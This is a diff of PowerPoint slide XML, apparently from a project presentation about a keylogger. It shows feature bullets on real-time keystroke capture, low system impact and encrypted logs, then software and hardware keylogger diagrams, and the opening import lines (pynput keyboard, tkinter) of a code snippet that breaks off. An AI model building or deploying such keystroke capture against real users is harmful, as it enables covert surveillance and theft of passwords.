-                <a:moveTo>
-                  <a:pt x="457200" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="42AF51"/>
-          </a:solidFill>
+          </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr/>
+            <a:pPr marL="38100">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="55"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
+              <a:rPr sz="1100" spc="10" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="2D936B"/>
+                </a:solidFill>
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>11</a:t>
+            </a:fld>
+            <a:endParaRPr sz="1100">
+              <a:latin typeface="Trebuchet MS"/>
+              <a:cs typeface="Trebuchet MS"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="object 4"/>
-          <p:cNvSpPr/>
+          <p:cNvPr id="9" name="TextBox 8">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956B4F59-714C-0945-3E73-53471E3202D5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
+            <a:off x="2518656" y="1616093"/>
+            <a:ext cx="7696200" cy="5078313"/>
           </a:xfrm>
-          <a:custGeom>
+          <a:prstGeom prst="rect">
             <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
+          </a:prstGeom>
+          <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr/>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Real-time Logging</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Instant Insights</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Instantly logs and displays keystrokes as they happen.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Customizable</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Flexible Settings</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Offers options to customize the logging format and frequency to suit your needs.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Lightweight</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Minimal System Impact</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Designed to have minimal impact on system resources, ensuring efficient performance.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Secure Logging</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Data Protection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Logs data securely with encryption options to protect sensitive information.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Demonstration</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Live Demo</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Real-time Performance</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Showcases the keylogger in action, capturing and displaying keystrokes instantly.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User Experience</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Ease of Use</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Highlights the intuitive interface and user-friendly experience, making it accessible for all users.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="object 6"/>
+          <p:cNvPicPr/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1666875" y="6467475"/>
+            <a:ext cx="76200" cy="177800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="object 9"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="11277218" y="6473337"/>
+            <a:ext cx="228600" cy="191770"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="38100">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="55"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
+              <a:rPr sz="1100" spc="10" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="2D936B"/>
+                </a:solidFill>
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>12</a:t>
+            </a:fld>
+            <a:endParaRPr sz="1100">
+              <a:latin typeface="Trebuchet MS"/>
+              <a:cs typeface="Trebuchet MS"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="object 5"/>
-          <p:cNvSpPr/>
+          <p:cNvPr id="8" name="object 8"/>
+          <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9353550" y="5895975"/>
-            <a:ext cx="180975" cy="180975"/>
+            <a:off x="739775" y="291147"/>
+            <a:ext cx="3303904" cy="758190"/>
           </a:xfrm>
-          <a:custGeom>
+          <a:prstGeom prst="rect">
             <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="180975" h="180975">
-                <a:moveTo>
-                  <a:pt x="180975" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D936B"/>
-          </a:solidFill>
+          </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr/>
+            <a:pPr marL="12700">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="105"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="15" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>M</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="-15" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>D</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="-35" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="-30" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>LL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="-5" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="30" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>N</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4800" b="1" spc="5" dirty="0">
+                <a:latin typeface="Trebuchet MS"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>G</a:t>
+            </a:r>
+            <a:endParaRPr sz="4800" dirty="0">
+              <a:latin typeface="Trebuchet MS"/>
+              <a:cs typeface="Trebuchet MS"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="13" name="Picture 12">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F527B0-0F47-77C4-9E3C-17320870B49B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="990600" y="1676400"/>
+            <a:ext cx="4810125" cy="3057525"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="15" name="Picture 14">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41928F2A-25CC-C2C0-631C-2C1BDC8EFBC6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7315200" y="2057400"/>
+            <a:ext cx="3581400" cy="2311631"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="TextBox 15">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614223B3-4638-13A9-3CFE-A857E47CAE18}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1524000" y="4733925"/>
+            <a:ext cx="3352800" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>    Software Keylogger diagram</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="TextBox 16">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2392610-F6E4-E17E-B626-57A83A918789}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7620000" y="4733925"/>
+            <a:ext cx="3048000" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>      Hardware Keylogger</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C78F7E-2495-3458-D782-33DEE0712AF2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="508819" y="19665"/>
+            <a:ext cx="4724400" cy="461665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Code</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> Snippet:</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495D6DC5-7FD9-BBEE-2594-EA4396050AFA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="762000" y="422111"/>
+            <a:ext cx="5562600" cy="6555641"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>import </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>tkinter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> as </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>tk</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>tkinter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> import *</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>pynput</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> import keyboard</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>import </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>json</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
